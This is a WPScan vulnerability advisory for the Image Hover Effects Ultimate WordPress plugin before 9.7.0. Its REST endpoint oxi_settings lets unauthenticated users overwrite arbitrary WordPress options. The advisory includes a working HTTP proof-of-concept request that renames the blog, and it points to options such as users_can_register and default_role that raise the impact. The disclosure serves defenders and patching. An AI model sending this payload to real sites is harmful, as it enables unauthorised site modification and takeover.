WPScan (wpvulndb) WPEX-ID: 75DA4102-7063-407F-975E-28BE6ED33AAC
Published: Dec 15, 2021

Image Hover Effects Ultimate < 9.7.0 - Unauthenticated Arbitrary Option Update

Tags: image hover effects, unauthenticated, arbitrary option update

EPSS: 0.002 (percentile 65.1%)

The plugin performs no authorisation checks on its REST API endpoints. One of them, oxi_settings under the ImageHoverUltimate/v1 namespace, accepts a rawdata parameter carrying a JSON object with name and value fields and writes that value to the named WordPress option, so unauthenticated attackers can update arbitrary blog options. The original report stated the issue was fixed in 9.6.2, but that release was still exploitable; proper remediation landed in 9.7.0. Since an arbitrary option write in WordPress is not limited to cosmetic settings (options such as users_can_register, default_role, siteurl and admin_email are all stored in the same table), the PoC's change of blogname should be read as a demonstration, not the ceiling of the impact.

Proof of Concept

```http
POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close

rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D
```
